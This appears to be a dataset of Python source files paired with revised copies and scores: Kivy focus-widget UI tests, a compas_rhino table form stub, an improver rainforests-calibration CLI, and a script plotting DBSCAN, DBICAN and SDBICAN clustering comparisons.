app.did_action = True
app.stop()
target_btn = FocusButton(text='Press me')
target_btn.bind(on_press=press)
scroll_container.add_widget(target_btn)
container = default_container()
first_focus = FocusButton(text='I should have focus first')
first_focus.focus = True
sv = ScrollView()
sv.add_widget(scroll_container)
container.add_widget(instructions)
container.add_widget(first_focus)
container.add_widget(sv)
app.root.add_widget(container)
return True
@run_in_app(app_class=CheckActionApp, timeout=20)
def test_focus_switch():
app = App.get_running_app()
instructions = Label(text='Activate all of these switches')
switches = [FocusSwitch() for _ in range(3)]
def done(*args):
if all(switch.active for switch in switches):
app.did_action = True
app.stop()
submit = FocusButton(text='Submit')
submit.bind(on_press=done)
container = default_container()
container.add_widget(instructions)
for switch in switches:
container.add_widget(switch)
container.add_widget(submit)
app.root.add_widget(container)
return True
class TreeViewFocusButton(FocusTreeViewNode, FocusButton):
def __init__(self, **kwargs):
FocusTreeViewNode.__init__(self, **kwargs)
FocusButton.__init__(self, **kwargs)
@run_in_app(app_class=CheckActionApp, timeout=30)
def test_tree_view():
app = App.get_running_app()
app.step_1 = False
instructions = Label(text='Press the first button under the first element, then the second button under the second element.', size_hint_y=0.1)
tv = FocusTreeView(size_hint_y=0.9)
node_1 = FocusTreeViewLabel(text='Go here first', size_hint_y=0.2)
node_2 = FocusTreeViewLabel(text='Go here second', size_hint_y=0.2)
btn_1 = TreeViewFocusButton(text='Press me first')
btn_2 = TreeViewFocusButton(text='Press me second')
fake_button = FocusButton(text='Ignore me')
def step_1(*args):
app.step_1 = True
def submit(*args):
if app.step_1:
app.did_action = True
app.stop()
btn_1.bind(on_press=step_1)
btn_2.bind(on_press=submit)
tv.add_node(node_1)
tv.add_node(node_2)
tv.add_node(btn_1, node_1)
tv.add_node(btn_2, node_2)
container = default_container()
container.add_widget(instructions)
container.add_widget(tv)
container.add_widget(fake_button)
app.root.add_widget(container)
return True | tests/actual/test_widget_interaction.py | import kivy
kivy.require('1.11.1')
from kivy.app import App
from kivy.clock import Clock
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.label import Label
from kivy.uix.scrollview import ScrollView
from kivy.uix.textinput import TextInput
from kivy.uix.tabbedpanel import TabbedPanelItem
from kivy.uix.treeview import TreeViewLabel
import pytest
from math import isclose
from common import run_in_app
from kivy_garden.advancedfocusbehavior import *
def default_container():
return FocusBoxLayout(orientation='vertical', padding=30, spacing=30)
class CheckActionApp(App):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.did_action = False
def stop(self):
super().stop()
assert self.did_action
class CheckFocusActionApp(FocusApp):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.did_action = False
def stop(self):
super().stop()
assert self.did_action
# TODO: move to different file
@run_in_app(app_class=CheckActionApp)
def test_focus_buttons():
app = App.get_running_app()
self = test_focus_buttons
def push_me(*args):
app.did_action = True
app.stop()
container = FocusBoxLayout()
btn = FocusButton(text='Press Enter', on_press=push_me)
container.add_widget(btn)
app.root.add_widget(container)
assert btn.focus
return True
@run_in_app(app_class=CheckActionApp)
def test_cycle_through_focusables():
app = App.get_running_app()
app.step_1 = False
def focus_1(btn, state):
if not state:
return
if app.step_1:
app.did_action = True
app.stop()
def focus_2(btn, state):
if not state:
return
if app.step_1:
app.stop()
else:
app.step_1 = True
def focus_3(btn, state):
if not state:
return
app.stop()
container = default_container()
container.add_widget(Label(text=('Press Tab once to cycle to the next widget, '
'then press Shift+Tab once to cycle back.')))
first = FocusButton(text='button 1')
second = FocusButton(text='button 2')
third = FocusButton(text='button 3')
first.bind(focus=focus_1)
second.bind(focus=focus_2)
third.bind(focus=focus_3)
for btn in (first, second, third):
container.add_widget(btn)
app.root.add_widget(container)
assert first.focus
return True
@run_in_app(app_class=CheckFocusActionApp, timeout=15)
def test_focus_from_nothing():
app = App.get_running_app()
instructions = Label(text='Press any button')
container = default_container()
container.add_widget(instructions)
def press(*args):
app.did_action = True
app.stop()
for _ in range(5):
btn = FocusButton(text='Press me', on_press=press)
container.add_widget(btn)
for widg in container.children:
if hasattr(widg, 'focus'):
widg.focus = False
app.root.add_widget(container)
return True
@run_in_app(app_class=CheckActionApp, timeout=20)
def test_carousel():
app = App.get_running_app()
app.step_1 = False
def press_1(*args):
app.step_1 = True
def press_2(*args):
if app.step_1:
app.did_action = True
app.stop()
car = FocusCarousel(direction='right')
car.add_widget(Label(text='Navigate to the right in the carousel'))
container = default_container()
btn_1 = FocusButton(text='Press me')
btn_2 = FocusButton(text='Press me after you\'ve pressed the other button')
btn_1.bind(on_press=press_1)
btn_2.bind(on_press=press_2)
container.add_widget(btn_1)
car.add_widget(container)
app.root.add_widget(car)
app.root.add_widget(btn_2)
return True
@run_in_app(app_class=CheckActionApp)
def test_checkbox():
app = App.get_running_app()
container = default_container()
lb = Label(text='Activate the checkbox, then press the button below it.')
cb = FocusCheckBox()
btn = FocusButton(text='Test checkbox')
def press_me(*args):
assert cb.active
app.did_action = True
app.stop()
btn.bind(on_press=press_me)
for widg in (lb, cb, btn):
container.add_widget(widg)
app.root.add_widget(container)
return True
@run_in_app(app_class=CheckActionApp)
def test_toggle_button():
app = App.get_running_app()
container = default_container()
lb = Label(text='Activate the toggle button, then press the button below it.')
tb = FocusToggleButton(text='off')
btn = FocusButton(text='Test toggle button')
def update_toggle_label(tbtn, val):
tbtn.text = 'on' if val == 'down' else 'off'
def press_me(*args):
assert tb.state == 'down'
app.did_action = True
app.stop()
tb.bind(state=update_toggle_label)
btn.bind(on_press=press_me)
for widg in (lb, tb, btn):
container.add_widget(widg)
app.root.add_widget(container)
return True
@run_in_app(app_class=CheckActionApp)
def test_slider():
value = 48
app = App.get_running_app()
container = default_container()
instruction_label = Label(text=f'Set the slider to {value}')
pos_label = Label()
slider = FocusSlider()
btn = FocusButton(text='Submit')
def update_pos_label(slider, value):
pos_label.text = str(int(value))
def press_me(*args):
assert int(slider.value) == value
app.did_action = True
app.stop()
slider.bind(value=update_pos_label)
btn.bind(on_press=press_me)
for widg in (instruction_label, pos_label, slider, btn):
container.add_widget(widg)
app.root.add_widget(container)
return True
@run_in_app(app_class=CheckActionApp)
def test_screen_manager():
app = App.get_running_app()
app.step_1 = False
instructions = Label(text=('Press the button on the next screen, then press'
' the button at the bottom of the app.'))
s1 = FocusScreen(name='screen_1')
container_1 = default_container()
to_screen_2 = FocusButton(text='To screen 2 ->')
container_1.add_widget(to_screen_2)
s1.add_widget(container_1)
s2 = FocusScreen(name='screen_2')
container_2 = default_container()
step_1_btn = FocusButton(text='Press me first!')
container_2.add_widget(step_1_btn)
s2.add_widget(container_2)
submit_btn = FocusButton(text='Submit')
manager = FocusScreenManager()
def press_step_1(*args):
app.step_1 = True
def press_to_screen_2(*args):
manager.current = 'screen_2'
def submit(*args):
if app.step_1:
app.did_action = True
app.stop()
to_screen_2.bind(on_press=press_to_screen_2)
step_1_btn.bind(on_press=press_step_1)
submit_btn.bind(on_press=submit)
manager.add_widget(s1)
manager.add_widget(s2)
app.root.add_widget(instructions)
app.root.add_widget(manager)
app.root.add_widget(submit_btn)
return True
@run_in_app(app_class=CheckActionApp, timeout=60)
def test_video_player():
target = 5 # seconds
app = App.get_running_app()
container = default_container()
instructions = Label(text=(f'1. Navigate to {target} seconds in the video\n'
'2. Mute the audio'), size_hint_y=0.1)
player = FocusVideoPlayer(source='tests/actual/test_data/mandelbrot.mp4')
submit = FocusButton(text='Submit', size_hint_y=0.1)
def on_submit(*args):
assert isclose(target, player.position, abs_tol=1)
assert player.volume == 0
app.did_action = True
app.stop()
submit.bind(on_press=on_submit)
container.add_widget(instructions)
container.add_widget(player)
container.add_widget(submit)
app.root.add_widget(container)
return True
@run_in_app(app_class=CheckActionApp)
def test_tabbed_panel():
app = App.get_running_app()
app.step_1 = False
container = default_container()
instructions = Label(text='Press the button on the next tab, then press Submit.')
tab_btn = FocusButton(text='Press me first')
submit_btn = FocusButton(text='Submit', size_hint_y=0.1)
inner_container = default_container()
ignore_btn = FocusButton(text='Ignore me')
inner_container.add_widget(instructions)
inner_container.add_widget(ignore_btn)
tp = FocusTabbedPanel()
tp.default_tab_content = inner_container
item = TabbedPanelItem(text='Go here')
item.add_widget(tab_btn)
tp.add_widget(item)
def press_ignore(*args): # Auto fail
app.stop()
def press_step_1(*args):
app.step_1 = True
def submit(*args):
if app.step_1:
app.did_action = True
app.stop()
ignore_btn.bind(on_press=press_ignore)
tab_btn.bind(on_press=press_step_1)
submit_btn.bind(on_press=submit)
container.add_widget(tp)
container.add_widget(submit_btn)
app.root.add_widget(container)
return True
@run_in_app(app_class=CheckActionApp)
def test_modal_view():
app = App.get_running_app()
container = default_container()
def show_modal():
view = FocusModalView(focus_return=container, auto_dismiss=False, size_hint=(0.5, 0.5))
dismiss_btn = FocusButton(text='Dismiss this modal', on_press=lambda _: view.dismiss())
view.add_widget(dismiss_btn)
view.open()
def submit(*args):
app.did_action = True
app.stop()
submit_btn = FocusButton(text='Press this after dismissing the modal view', on_press=submit)
container.add_widget(submit_btn)
app.root.add_widget(container)
Clock.schedule_once(lambda _: show_modal())
return True
@run_in_app(app_class=CheckActionApp)
def test_popup():
app = App.get_running_app()
container = default_container()
def show_popup():
inner_container = default_container()
dismiss_btn = FocusButton(text='Dismiss this popup')
view = FocusPopup(title='Popup', content=inner_container, focus_return=container,
auto_dismiss=False, size_hint=(0.5, 0.5))
dismiss_btn.bind(on_press=lambda *args: view.dismiss())
inner_container.add_widget(dismiss_btn)
view.open()
def submit(*args):
app.did_action = True
app.stop()
submit_btn = FocusButton(text='Press this after dismissing the popup', on_press=submit)
container.add_widget(submit_btn)
app.root.add_widget(container)
Clock.schedule_once(lambda _: show_popup())
return True
@run_in_app(app_class=CheckActionApp, timeout=20)
def test_accordion():
app = App.get_running_app()
app.step_1 = False
instructions = Label(text='Navigate to the next accordion section.')
step_1_btn = FocusButton(text='Press me first')
submit_btn = FocusButton(text='Press me second')
container_1 = default_container()
container_1.add_widget(instructions)
container_2 = default_container()
container_2.add_widget(step_1_btn)
acc = FocusAccordion()
item_1 = FocusAccordionItem()
item_1.add_widget(container_1)
acc.add_widget(item_1)
item_2 = FocusAccordionItem()
item_2.add_widget(container_2)
acc.add_widget(item_2)
acc.select(item_1)
container = default_container()
container.add_widget(acc)
container.add_widget(submit_btn)
def step_1(*args):
app.step_1 = True
def submit(*args):
if app.step_1:
app.did_action = True
app.stop()
step_1_btn.bind(on_press=step_1)
submit_btn.bind(on_press=submit)
app.root.add_widget(container)
return True
@run_in_app(app_class=CheckActionApp, timeout=25)
def test_scroll_view():
app = App.get_running_app()
instructions = Label(text='Look through the scroll area to find the correct button to press.', size_hint_y=0.1)
correct_button = 'Button 3'
scroll_container = FocusGridLayout(cols=10, size_hint=(None, None), size=(1000, 1000))
for _ in range(99):
scroll_container.add_widget(Label(text='Ignore me'))
scroll_container.add_widget(Label(text=correct_button))
button_container = FocusBoxLayout(orientation='horizontal', padding=10, spacing=10, size_hint_y=0.15)
def guess(btn, *args):
if btn.text == correct_button:
app.did_action = True
app.stop()
for i in range(5):
btn = FocusButton(text=f'Button {i}')
btn.bind(on_press=guess)
button_container.add_widget(btn)
container = default_container()
sv = FocusScrollView()
sv.add_widget(scroll_container)
for widg in (instructions, sv, button_container):
container.add_widget(widg)
app.root.add_widget(container)
return True
@run_in_app(app_class=CheckActionApp, timeout=25)
def test_focus_scroll_into_view():
app = App.get_running_app()
instructions = Label(text='Press the button within the ScrollView (by tabbing to it)')
scroll_container = FocusGridLayout(cols=10, size_hint=(None, None), size=(1000, 1000))
for _ in range(99):
scroll_container.add_widget(Label(text='Ignore me'))
def press(*args):
app.did_action = True
app.stop()
target_btn = FocusButton(text='Press me')
target_btn.bind(on_press=press)
scroll_container.add_widget(target_btn)
container = default_container()
first_focus = FocusButton(text='I should have focus first')
first_focus.focus = True
sv = ScrollView()
sv.add_widget(scroll_container)
container.add_widget(instructions)
container.add_widget(first_focus)
container.add_widget(sv)
app.root.add_widget(container)
return True
@run_in_app(app_class=CheckActionApp, timeout=20)
def test_focus_switch():
app = App.get_running_app()
instructions = Label(text='Activate all of these switches')
switches = [FocusSwitch() for _ in range(3)]
def done(*args):
if all(switch.active for switch in switches):
app.did_action = True
app.stop()
submit = FocusButton(text='Submit')
submit.bind(on_press=done)
container = default_container()
container.add_widget(instructions)
for switch in switches:
container.add_widget(switch)
container.add_widget(submit)
app.root.add_widget(container)
return True
class TreeViewFocusButton(FocusTreeViewNode, FocusButton):
def __init__(self, **kwargs):
FocusTreeViewNode.__init__(self, **kwargs)
FocusButton.__init__(self, **kwargs)
@run_in_app(app_class=CheckActionApp, timeout=30)
def test_tree_view():
app = App.get_running_app()
app.step_1 = False
instructions = Label(text='Press the first button under the first element, then the second button under the second element.', size_hint_y=0.1)
tv = FocusTreeView(size_hint_y=0.9)
node_1 = FocusTreeViewLabel(text='Go here first', size_hint_y=0.2)
node_2 = FocusTreeViewLabel(text='Go here second', size_hint_y=0.2)
btn_1 = TreeViewFocusButton(text='Press me first')
btn_2 = TreeViewFocusButton(text='Press me second')
fake_button = FocusButton(text='Ignore me')
def step_1(*args):
app.step_1 = True
def submit(*args):
if app.step_1:
app.did_action = True
app.stop()
btn_1.bind(on_press=step_1)
btn_2.bind(on_press=submit)
tv.add_node(node_1)
tv.add_node(node_2)
tv.add_node(btn_1, node_1)
tv.add_node(btn_2, node_2)
container = default_container()
container.add_widget(instructions)
container.add_widget(tv)
container.add_widget(fake_button)
app.root.add_widget(container)
return True | 0.321673 | 0.113629 |
from __future__ import print_function
from compas_rhino.forms import Form
try:
from System.Windows.Forms import Button
from System.Windows.Forms import DialogResult
from System.Windows.Forms import DataGridViewColumnSortMode
from System.Windows.Forms import FlowLayoutPanel
from System.Windows.Forms import TableLayoutPanel
from System.Windows.Forms import AnchorStyles
from System.Windows.Forms import FlowDirection
from System.Windows.Forms import BorderStyle
from System.Windows.Forms import DockStyle
from System.Windows.Forms import RowStyle
from System.Windows.Forms import SizeType
except ImportError:
import sys
if 'ironpython' in sys.version.lower():
raise
__all__ = ['TableForm']
class TableForm(Form):
""""""
def __init__(self, columns, rows, title=None, width=None, height=None):
self.columns = columns
self.rows = rows
super(TableForm, self).__init__(title, width, height)
def init(self):
ok = Button()
ok.Text = 'OK'
ok.DialogResult = DialogResult.OK
cancel = Button()
cancel.Text = 'Cancel'
cancel.DialogResult = DialogResult.Cancel
buttonlayout = FlowLayoutPanel()
buttonlayout.Height = 30
buttonlayout.Anchor = AnchorStyles.Bottom | AnchorStyles.Right
buttonlayout.FlowDirection = FlowDirection.RightToLeft
# buttonlayout.BorderStyle = BorderStyle.None
buttonlayout.Controls.Add(cancel)
buttonlayout.Controls.Add(ok)
formlayout = TableLayoutPanel()
formlayout.Dock = DockStyle.Fill
# formlayout.BorderStyle = BorderStyle.None
formlayout.ColumnCount = 1
formlayout.RowCount = 2
formlayout.RowStyles.Add(RowStyle(SizeType.Percent, 100))
formlayout.Controls.Add(table, 0, 0)
formlayout.Controls.Add(buttonlayout, 0, 1)
self.Controls.Add(formlayout)
def on_form_closed(self, sender, e):
pass
class Table():
pass
# ==============================================================================
# Main
# ==============================================================================
if __name__ == '__main__':
headers = ['A', 'B', 'C', 'D']
rows = [[i, i, i, i] for i in range(100)]
form = TableForm(headers, rows)
form.show() | src/compas_rhino/forms/_table.py | from __future__ import print_function
from compas_rhino.forms import Form
try:
from System.Windows.Forms import Button
from System.Windows.Forms import DialogResult
from System.Windows.Forms import DataGridViewColumnSortMode
from System.Windows.Forms import FlowLayoutPanel
from System.Windows.Forms import TableLayoutPanel
from System.Windows.Forms import AnchorStyles
from System.Windows.Forms import FlowDirection
from System.Windows.Forms import BorderStyle
from System.Windows.Forms import DockStyle
from System.Windows.Forms import RowStyle
from System.Windows.Forms import SizeType
except ImportError:
import sys
if 'ironpython' in sys.version.lower():
raise
__all__ = ['TableForm']
class TableForm(Form):
""""""
def __init__(self, columns, rows, title=None, width=None, height=None):
self.columns = columns
self.rows = rows
super(TableForm, self).__init__(title, width, height)
def init(self):
ok = Button()
ok.Text = 'OK'
ok.DialogResult = DialogResult.OK
cancel = Button()
cancel.Text = 'Cancel'
cancel.DialogResult = DialogResult.Cancel
buttonlayout = FlowLayoutPanel()
buttonlayout.Height = 30
buttonlayout.Anchor = AnchorStyles.Bottom | AnchorStyles.Right
buttonlayout.FlowDirection = FlowDirection.RightToLeft
# buttonlayout.BorderStyle = BorderStyle.None
buttonlayout.Controls.Add(cancel)
buttonlayout.Controls.Add(ok)
formlayout = TableLayoutPanel()
formlayout.Dock = DockStyle.Fill
# formlayout.BorderStyle = BorderStyle.None
formlayout.ColumnCount = 1
formlayout.RowCount = 2
formlayout.RowStyles.Add(RowStyle(SizeType.Percent, 100))
formlayout.Controls.Add(table, 0, 0)
formlayout.Controls.Add(buttonlayout, 0, 1)
self.Controls.Add(formlayout)
def on_form_closed(self, sender, e):
pass
class Table():
pass
# ==============================================================================
# Main
# ==============================================================================
if __name__ == '__main__':
headers = ['A', 'B', 'C', 'D']
rows = [[i, i, i, i] for i in range(100)]
form = TableForm(headers, rows)
form.show() | 0.303525 | 0.034036 |
"""CLI to apply rainforests calibration."""
from improver import cli
@cli.clizefy
@cli.with_output
def process(
forecast: cli.inputcube,
*features: cli.inputcube,
model_config: cli.inputjson,
error_percentiles_count: int = 19,
output_realizations_count: int = 100,
threads: int = 1,
):
"""
Calibrate a forecast cube using the Rainforests method.
Ensemble forecasts must be in realization representation. Deterministic forecasts
can be processed to produce a pseudo-ensemble; a realization dimension will be added
to deterministic forecast cubes if one is not already present.
This calibration is done in a situation dependent fashion using a series of
decision-tree models to construct representative error distributions which are
then used to map each input ensemble member onto a series of realisable values.
These series collectively form a super-ensemble, from which realizations are
sampled to produce the calibrated forecast.
Args:
forecast_cube (iris.cube.Cube):
Cube containing the forecast to be calibrated; must be as realizations.
feature_cubes (iris.cube.Cubelist):
Cubelist containing the feature variables (physical parameters) used as inputs
to the tree-models for the generation of the associated error distributions.
Feature cubes are expected to have the same dimensions as forecast_cube, with
the exception of the realization dimension. Where the feature_cube contains a
realization dimension this is expected to be consistent, otherwise the cube will
be broadcast along the realization dimension.
model_config (dict):
Dictionary containing RainForests model configuration data.
error_percentiles_count (int):
The number of error percentiles to apply to each ensemble realization.
The resulting super-ensemble will be of size = forecast.realization.size *
error_percentiles_count.
output_realizations_count (int):
The number of realizations to output for the calibrated ensemble.
These realizations are sampled by taking equispaced percentiles
from the super-ensemble. If None is supplied, then all realizations
from the super-ensemble will be returned.
threads (int):
Number of threads to use during prediction with tree-model objects.
Returns:
iris.cube.Cube:
The forecast cube following calibration.
"""
from iris.cube import CubeList
from improver.calibration.rainforest_calibration import ApplyRainForestsCalibration
return ApplyRainForestsCalibration(model_config, threads).process(
forecast,
CubeList(features),
error_percentiles_count=error_percentiles_count,
output_realizations_count=output_realizations_count,
) | improver/cli/apply_rainforests_calibration.py | """CLI to apply rainforests calibration."""
from improver import cli
@cli.clizefy
@cli.with_output
def process(
forecast: cli.inputcube,
*features: cli.inputcube,
model_config: cli.inputjson,
error_percentiles_count: int = 19,
output_realizations_count: int = 100,
threads: int = 1,
):
"""
Calibrate a forecast cube using the Rainforests method.
Ensemble forecasts must be in realization representation. Deterministic forecasts
can be processed to produce a pseudo-ensemble; a realization dimension will be added
to deterministic forecast cubes if one is not already present.
This calibration is done in a situation dependent fashion using a series of
decision-tree models to construct representative error distributions which are
then used to map each input ensemble member onto a series of realisable values.
These series collectively form a super-ensemble, from which realizations are
sampled to produce the calibrated forecast.
Args:
forecast_cube (iris.cube.Cube):
Cube containing the forecast to be calibrated; must be as realizations.
feature_cubes (iris.cube.Cubelist):
Cubelist containing the feature variables (physical parameters) used as inputs
to the tree-models for the generation of the associated error distributions.
Feature cubes are expected to have the same dimensions as forecast_cube, with
the exception of the realization dimension. Where the feature_cube contains a
realization dimension this is expected to be consistent, otherwise the cube will
be broadcast along the realization dimension.
model_config (dict):
Dictionary containing RainForests model configuration data.
error_percentiles_count (int):
The number of error percentiles to apply to each ensemble realization.
The resulting super-ensemble will be of size = forecast.realization.size *
error_percentiles_count.
output_realizations_count (int):
The number of realizations to output for the calibrated ensemble.
These realizations are sampled by taking equispaced percentiles
from the super-ensemble. If None is supplied, then all realizations
from the super-ensemble will be returned.
threads (int):
Number of threads to use during prediction with tree-model objects.
Returns:
iris.cube.Cube:
The forecast cube following calibration.
"""
from iris.cube import CubeList
from improver.calibration.rainforest_calibration import ApplyRainForestsCalibration
return ApplyRainForestsCalibration(model_config, threads).process(
forecast,
CubeList(features),
error_percentiles_count=error_percentiles_count,
output_realizations_count=output_realizations_count,
) | 0.956237 | 0.491456 |
import os
import numpy as np
from collections import Counter
import matplotlib.pyplot as plt
from pylab import rcParams
from sklearn.cluster import dbscan
from tefingerprint.cluster import DBICAN, SDBICAN
# directory of this script
directory = os.path.dirname(os.path.abspath(__file__))
# figure 1: comparison of DBSCAN DBSCAN* and DBICAN
# read tip positions
points = np.array([1, 2, 2, 3, 3, 4, 4, 4, 5, 6, 6, 8, 11, 12,
12, 13, 13, 13, 14, 14, 14, 15, 15, 16, 18,
23, 25, 26, 27, 27, 28, 29, 30, 31, 33])
# variables
mpts = 10
eps = 5
# DBSCAN labels
cores, dbscan_labels = dbscan(points.reshape(-1, 1),
eps=eps,
min_samples=mpts)
# DBSCAN* labels are same for core points but otherwise -1
dbscanx_labels = np.zeros(len(points), dtype=np.int) - 1
dbscanx_labels[cores] = dbscan_labels[cores]
# DBICAN labels
dbican = DBICAN(min_points=mpts, epsilon=eps)
dbican.fit(points)
dbican_labels = dbican.labels()
# plotting
labels_list = [dbscan_labels, dbscanx_labels, dbican_labels]
name_list = [r'DBSCAN', r'DBSCAN*', 'DBICAN']
title = r'Comparison of Algorithms with $m_{pts}=10$ and $\varepsilon=5$'
legend_labels = ['.', '1', '2']
x_max_ofset = 2
height = 2.5
width = 6
n_row = 3
n_col = 1
rcParams['figure.figsize'] = width, height
x_max = np.max(points) + x_max_ofset
position = np.arange(x_max)
colour = np.zeros(position.shape, dtype='U2')
grey = '#C8C8C8'
colour[:] = grey
fig, ax = plt.subplots(n_row, n_col, sharex='col', sharey='row')
for row in range(n_row):
name = name_list[row]
labels = labels_list[row]
for l in [-1, 0, 1]:
if l is -1:
colour = grey
else:
colour = 'C{0}'.format(l)
counts = np.zeros(x_max, dtype=np.int)
counts_ = Counter(points[labels == l])
for i in range(len(position)):
if i in counts_:
counts[i] = counts_[i]
ax[row].bar(position,
counts,
width=1,
color=colour,
tick_label=position)
if row is 0:
ax[row].arrow(23, 2.5, dx=0, dy=-1,
length_includes_head=True,
head_width=0.5,
head_length=0.2)
if row is 0:
ax[row].set_title(title)
ax[row].get_xaxis().set_ticks([])
ax[row].get_yaxis().set_ticks([])
ax[row].set_ylabel(name)
plt.savefig(directory+'/DBICAN.png')
# figure 2: comparison of DBICAN and SDBICAN
# read tip positions
points = np.array([1, 2, 2, 3, 3, 4, 4, 4, 5, 6, 6, 8, 11, 12,
12, 13, 13, 13, 14, 14, 14, 15, 15, 16, 18])
# variables
mpts = 10
# plot
legend_labels = ['.', '1', '2']
x_max_ofset = 2
height = 5
width = 6
n_row = 10
n_col = 2
rcParams['figure.figsize'] = width, height
x_max = np.max(points) + x_max_ofset
position = np.arange(x_max)
colour = np.zeros(position.shape, dtype='U2')
grey = '#C8C8C8'
colour[:] = grey
fig, ax = plt.subplots(n_row, n_col, sharex='col', sharey='row')
for col in range(n_col):
for row in range(n_row):
mpts = 10
eps = row + 1
if col is 0:
model = DBICAN(mpts, eps)
elif col is 1:
model = SDBICAN(mpts, eps)
model.fit(points)
labels = model.labels()
for l in [-1, 0, 1]:
if l is -1:
colour = grey
else:
colour = 'C{0}'.format(l)
counts = np.zeros(x_max, dtype=np.int)
counts_ = Counter(points[labels == l])
for i in range(len(position)):
if i in counts_:
counts[i] = counts_[i]
ax[row, col].bar(position,
counts,
width=1,
color=colour,
tick_label=position)
ax[row, col].get_xaxis().set_ticks([])
ax[row, col].get_yaxis().set_ticks([])
if row is 0:
ax[row, col].set_title('SDBICAN' if col else 'DBICAN')
if col is 0:
ax[row, col].set_ylabel(r'$\varepsilon={0}$'.format(eps))
plt.savefig(directory+'/SDBICAN.png') | docs/figure/figures.py | import os
import numpy as np
from collections import Counter
import matplotlib.pyplot as plt
from pylab import rcParams
from sklearn.cluster import dbscan
from tefingerprint.cluster import DBICAN, SDBICAN
# directory of this script (figures are saved next to it)
directory = os.path.dirname(os.path.abspath(__file__))

# figure 1: comparison of DBSCAN, DBSCAN* and DBICAN
# read tip positions
points = np.array([1, 2, 2, 3, 3, 4, 4, 4, 5, 6, 6, 8, 11, 12,
                   12, 13, 13, 13, 14, 14, 14, 15, 15, 16, 18,
                   23, 25, 26, 27, 27, 28, 29, 30, 31, 33])

# clustering parameters: minimum cluster size and neighbourhood radius
mpts = 10
eps = 5

# DBSCAN labels (points must be 2-D for sklearn, hence the reshape)
cores, dbscan_labels = dbscan(points.reshape(-1, 1),
                              eps=eps,
                              min_samples=mpts)

# DBSCAN* labels are the same as DBSCAN for core points but otherwise -1
# NOTE: np.int was removed in NumPy 1.20+; the builtin int is equivalent
dbscanx_labels = np.zeros(len(points), dtype=int) - 1
dbscanx_labels[cores] = dbscan_labels[cores]

# DBICAN labels
dbican = DBICAN(min_points=mpts, epsilon=eps)
dbican.fit(points)
dbican_labels = dbican.labels()

# plotting: one row per algorithm; bars count points at each integer
# position, coloured per cluster label (grey = noise / label -1)
labels_list = [dbscan_labels, dbscanx_labels, dbican_labels]
name_list = [r'DBSCAN', r'DBSCAN*', 'DBICAN']
title = r'Comparison of Algorithms with $m_{pts}=10$ and $\varepsilon=5$'
x_max_offset = 2
height = 2.5
width = 6
n_row = 3
n_col = 1
rcParams['figure.figsize'] = width, height
x_max = np.max(points) + x_max_offset
position = np.arange(x_max)
grey = '#C8C8C8'
fig, ax = plt.subplots(n_row, n_col, sharex='col', sharey='row')
for row in range(n_row):
    name = name_list[row]
    labels = labels_list[row]
    for label in [-1, 0, 1]:
        # compare ints with `==`, not `is`: identity of small ints is an
        # implementation detail (SyntaxWarning on Python 3.8+)
        colour = grey if label == -1 else 'C{0}'.format(label)
        counts = np.zeros(x_max, dtype=int)
        # histogram of positions belonging to this cluster label
        for pos, count in Counter(points[labels == label]).items():
            counts[pos] = count
        ax[row].bar(position,
                    counts,
                    width=1,
                    color=colour,
                    tick_label=position)
    if row == 0:
        # arrow annotation pointing down at the point at x=23 on the top row
        ax[row].arrow(23, 2.5, dx=0, dy=-1,
                      length_includes_head=True,
                      head_width=0.5,
                      head_length=0.2)
        ax[row].set_title(title)
    ax[row].get_xaxis().set_ticks([])
    ax[row].get_yaxis().set_ticks([])
    ax[row].set_ylabel(name)
plt.savefig(directory + '/DBICAN.png')
# figure 2: comparison of DBICAN and SDBICAN
# read tip positions (same data as figure 1 without the second group)
points = np.array([1, 2, 2, 3, 3, 4, 4, 4, 5, 6, 6, 8, 11, 12,
                   12, 13, 13, 13, 14, 14, 14, 15, 15, 16, 18])

# clustering parameter: minimum cluster size (epsilon varies per row)
mpts = 10

# plot: one column per algorithm, one row per epsilon value 1..n_row
x_max_offset = 2
height = 5
width = 6
n_row = 10
n_col = 2
rcParams['figure.figsize'] = width, height
x_max = np.max(points) + x_max_offset
position = np.arange(x_max)
grey = '#C8C8C8'
fig, ax = plt.subplots(n_row, n_col, sharex='col', sharey='row')
for col in range(n_col):
    for row in range(n_row):
        eps = row + 1
        # column 0 shows DBICAN, column 1 shows SDBICAN
        # (compare ints with `==`, not `is` — SyntaxWarning on 3.8+)
        model = DBICAN(mpts, eps) if col == 0 else SDBICAN(mpts, eps)
        model.fit(points)
        labels = model.labels()
        for label in [-1, 0, 1]:
            colour = grey if label == -1 else 'C{0}'.format(label)
            # NOTE: np.int was removed in NumPy 1.20+; builtin int is equivalent
            counts = np.zeros(x_max, dtype=int)
            # histogram of positions belonging to this cluster label
            for pos, count in Counter(points[labels == label]).items():
                counts[pos] = count
            ax[row, col].bar(position,
                             counts,
                             width=1,
                             color=colour,
                             tick_label=position)
        ax[row, col].get_xaxis().set_ticks([])
        ax[row, col].get_yaxis().set_ticks([])
        if row == 0:
            ax[row, col].set_title('SDBICAN' if col else 'DBICAN')
        if col == 0:
            ax[row, col].set_ylabel(r'$\varepsilon={0}$'.format(eps))
plt.savefig(directory+'/SDBICAN.png') | 0.397704 | 0.373647 |